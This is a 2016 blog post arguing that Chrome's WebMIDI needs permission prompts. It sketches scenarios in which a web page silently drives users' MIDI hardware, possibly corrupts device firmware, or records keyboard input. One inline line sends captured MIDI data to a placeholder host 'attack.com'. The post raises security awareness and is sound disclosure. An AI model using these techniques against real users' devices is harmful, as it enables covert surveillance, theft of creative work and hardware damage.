Nightmare scenarios with WebMIDI

November 2nd, 2016. Tagged: security, WebAudio

In the spirit of Halloween... allow me to entertain you with some security and privacy nightmares with the way WebMIDI is implemented in Chrome currently.

The spec says: "The suggested security model explicitly allows user agents to require the user's approval before giving access to MIDI devices, although it is not currently required to prompt the user for this approval"

I think the UA should require approval and below are 3 (+1) scenarios showing how things can go wrong. The overall idea is that using WebMIDI you can read MIDI messages from various devices (so you can think of it as kinda like a microphone) and you can send MIDI messages too, making hardware around the user do something for you (the attacker).

1. Prank

Check out what I did in the previous post:

This is a demo of using a simple bit of JavaScript to send random MIDI messages to a control surface that happens to be attached to the computer. The user doesn't need to allow the messages to be sent. The attacker doesn't need to fingerprint the device, just enumerate all devices and send junk to the [0] one.

Imagine you work at a studio that has a similar MIDI control surface. Most studios do. You go to a random page that promises cats. You can almost sense the upcoming entertainment value. Suddenly your control surface starts moving randomly! Even without Yoda in the vocal booth. How freaky is this!

How may planets need to align for this to happen?
Some. You need to have a control surface or any other MIDI device plugged into the computer.

Impact?
Fairly limited beyond the prank value. Could be irritating to return the controls to where you had them before, but you have backups of the DAW (Digital Audio Workstation) session, right? Right?!

1.1. Prank++

A small variation of this is if the victim has a device capable of making noise. Like a digital piano. Imagine it's dark, past midnight. The victim just managed to put the baby to bed. Quiet, very quiet. The victim decides to relieve a bit of the stress of putting the baby to sleep with some light entertainment that includes cats. Suddenly the keyboard starts playing (way too loud - yup, another lucky MIDI message) the Star Wars theme! Or Wagner's Ride of the Valkyries. TAA-DA, TA-TADADAAA-DA, DAT-DA-DA-DAAAA!

The house is up in arms, the baby cries, the spouse blames. Oh, the pain, the horror!

Bonus scenario - other than baby trouble, the victim's great-grandma just passed away and the victim was thinking of her. Missing her. Hoping she's still around. And her favorite piece was The Ride of the Valkyries... spooooky...

How may planets need to align for this to happen?
Some. You need a MIDI device that makes sounds plugged into the computer.

Impact?
Fairly limited beyond the prank value. Or is it a heart attack? A special facility for the victim who believes in ghosts of dead people playing the piano?

2. Mess up firmware

The control surface in the video above is a Mackie. Now dig this - the way to install a firmware update to the Mackie hardware is by playing a MIDI file! Whaaa. Yup, look it up. That's amazing. This means you (as a hardware developer) can tell people to come to your page, click a <button> and upgrade their hardware. That's so much simpler than downloading a zip with a MIDI and PDF, reading and following the instructions of how exactly to play the MIDI and how to route stuff in your DAW so it works.

This is great news for hardware devs but also great news for an attacker. Maybe they can install an update you don't want. Maybe they can figure out an update sequence that renders your hardware unusable. Since there's no user consent, nothing can stop them. One cat page and your device stops working...

How may planets need to align for this to happen?
Most. You need a MIDI device that takes firmware updates in the form of MIDI messages. And (in the case of the Mackie) the device is restarted in "boot mode" which allows it to accept said messages and act on them.

Impact?
Could be nasty if someone messes up your hardware. Cost to repair, lost income for a studio facility... A competitor running an organized attack against all clients of the vulnerable hardware and making the news your hardware is unreliable

3. p0wn Kanye's next hit

K, so the cases above were about sending MIDI messages. Let's wrap up with one where the attacker reads MIDI messages.

You tweet Kanye West a link to an article, which talks about how great he is (in addition to all the cats, naturally). He loads your page, you give him cats and a long "Loading..." animation. He wants to read how great he is but gets bored waiting. He reaches the nearest keyboard and starts playing his upcoming hit melody he's been working so hard to perfect. The keyboard is connected to the computer and it starts sending your cat page MIDI messages. You listen, new Image().src = 'attack.com?midi=[144,123,12][128,12,14].... the melody to you, record it and put it up on Spotify later that night. Kanye still waits for the page to load while you laugh all the way to the bank to cache the royalties from the hit. Or because you ain't got no fans and your version of the song is awful, it's not a hit. You make 0 money. So you wait for Kanye's version to explode and then sue him because he blatantly stole from your song released weeks ago.

Because there's no user approval, nowhere in the process was Kanye aware that his keyboard was bugged. By a web page!

How may planets need to align for this to happen?
Not that many. You need one Kanye playing and one keyboard attached to the computer.

Impact?
Stealing intellectual property at worst, privacy snooping at best.

yeah...

I hate clicking on permission prompts as much as the next person, but I think in this case we need one (to send MIDI messages and another one to receive 'em). Thanks for reading!

Tell your friends about this post: Facebook, Twitter, Google+

Sorry, comments disabled and hidden due to excessive spam. Working on restoring the existing comments...

Meanwhile, hit me up on twitter @stoyanstefanov